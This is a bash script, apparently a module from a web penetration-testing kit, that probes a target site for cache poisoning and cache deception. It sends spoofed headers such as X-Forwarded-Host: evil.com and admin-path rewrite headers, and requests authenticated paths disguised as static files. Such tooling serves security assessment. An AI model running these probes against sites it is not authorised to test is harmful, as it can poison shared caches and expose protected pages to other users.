#!/bin/bash
# Web cache poisoning + cache deception
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
source "$SCRIPT_DIR/../config.sh"
OUT="$OUT/cache_poison"
mkdir -p "$OUT"

echo '=== CACHE POISONING TESTS ===' | tee "$OUT/summary.txt"

# Unkeyed header injection
echo '--- Unkeyed Header Cache Poison ---' | tee -a "$OUT/summary.txt"
POISON_HEADERS=(
  'X-Forwarded-Host: evil.com'
  'X-Forwarded-Scheme: http'
  'X-Forwarded-Proto: http'
  'X-Original-URL: /admin'
  'X-Rewrite-URL: /admin'
  'X-Custom-IP-Authorization: 127.0.0.1'
)
for hdr in "${POISON_HEADERS[@]}"; do
  resp=$(curl -sk -o "$OUT/poison_body.txt" -w '%{http_code}' --max-time 10 -H "$hdr" "$TARGET/")
  body_check=$(grep -i 'evil.com\|127.0.0.1' "$OUT/poison_body.txt" 2>/dev/null | head -1)
  echo "[$resp] $hdr | reflected: ${body_check:-none}" | tee -a "$OUT/summary.txt"
done

# Cache deception - append .css/.js to authenticated paths
echo '' | tee -a "$OUT/summary.txt"
echo '--- Cache Deception ---' | tee -a "$OUT/summary.txt"
DECEPTION_PATHS=('/admin/index.php/.css' '/api/keys.js' '/user/profile.png' '/account.css')
for p in "${DECEPTION_PATHS[@]}"; do
  resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 "$TARGET$p")
  echo "[$resp] $p" | tee -a "$OUT/summary.txt"
done

# Parameter pollution
echo '' | tee -a "$OUT/summary.txt"
echo '--- Parameter Pollution ---' | tee -a "$OUT/summary.txt"
resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 "$TARGET/?foo=bar&foo=baz")
echo "[$resp] Duplicate param ?foo=bar&foo=baz" | tee -a "$OUT/summary.txt"
resp=$(curl -sk -o /dev/null -w '%{http_code}' --max-time 10 "$TARGET/?cb=$(date +%s)")
echo "[$resp] Cache buster param" | tee -a "$OUT/summary.txt"

cat "$OUT/summary.txt"